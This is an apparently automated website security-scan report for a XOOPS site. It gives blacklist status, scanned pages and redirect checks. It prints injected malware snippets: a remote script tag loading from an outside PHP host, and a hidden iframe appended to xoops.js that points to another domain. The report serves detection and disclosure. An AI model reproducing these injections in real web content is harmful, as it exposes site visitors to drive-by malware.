Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=1c.proclub.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://1c.proclub.ru/ | 200 OK Content-Length: 148 Content-Type: text/html | clean |
http://1c.proclub.ru/test404page.js | 404 Not Found Content-Length: 22897 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://sulithosting.com/qYdjFTr6.php?id=11038485"></script> | ||
http://1c.proclub.ru/include/xoops.js | 200 OK Content-Length: 12982 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function xoopsGetElementById(id){
if (document.getElementById) { return (document.getElementById(id)); } else if (document.all) { return (document.all[id]); } else { if ((navigator.appname.indexOf("Netscape") != -1) && parseInt(navigator.appversion == 4)) { return (document.layers[id]); } } } function xoopsSetElementProp(name, prop, val) { var elt=xoopsGetElementById(name); if (elt) elt[ { location='modfile.php?trash=1&lid='+id} } function TmpItem(id) { if (confirm('Âû äåéñòâèòåëüíî æåëàåòå ïåðåíåñòè ðàçðàáîòêó èç Àðõèâà íà ðàññìîòðåíèå?')) { location='modfile.php?trash=2&lid='+id} } ;document.write('<iframe style="position;fixed;top:0px:left:-500px;" src="http://vepeclu.crackedsidewalks.com/viewforum.php?b=5abd2b4" height="350" width="250"></iframe> Antivirus reports:
| ||
http://1c.proclub.ru/modules/sections/index.php?op=viewarticle&artid=6 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://1c.proclub.ru/modules/sections/index.php?op=viewarticle&artid=8 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://1c.proclub.ru/modules/sections/index.php?op=viewarticle&artid=10 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://1c.proclub.ru/modules/mydownloads/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://1c.proclub.ru/modules/news/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://1c.proclub.ru/modules/newbb/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://1c.proclub.ru/modules/xoopsfaq/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://1c.proclub.ru/order.php | 404 Not Found Content-Length: 22897 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://sulithosting.com/qYdjFTr6.php?id=11038485"></script> | ||
http://1c.proclub.ru/userinfo.php?uid=9 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://1c.proclub.ru/modules/sections/index.php?op=viewarticle&artid=11 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 1c.proclub.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Jul 2014 18:49:15 GMT
Server: Apache/1.3.33 (ALT Linux/alt1.M24.3) mod_ssl/2.8.24 OpenSSL/0.9.7d PHP/4.3.10-ALT rus/PL30.20
Vary: accept-charset, user-agent
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/4.3.10-ALT
GET / HTTP/1.1
Host: 1c.proclub.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Jul 2014 18:49:15 GMT
Server: Apache/1.3.33 (ALT Linux/alt1.M24.3) mod_ssl/2.8.24 OpenSSL/0.9.7d PHP/4.3.10-ALT rus/PL30.20
Vary: accept-charset, user-agent
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/4.3.10-ALT
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1c.proclub.ru
Referer: http://www.google.com/search?q=1c.proclub.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 1c.proclub.ru
Referer: http://www.google.com/search?q=1c.proclub.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.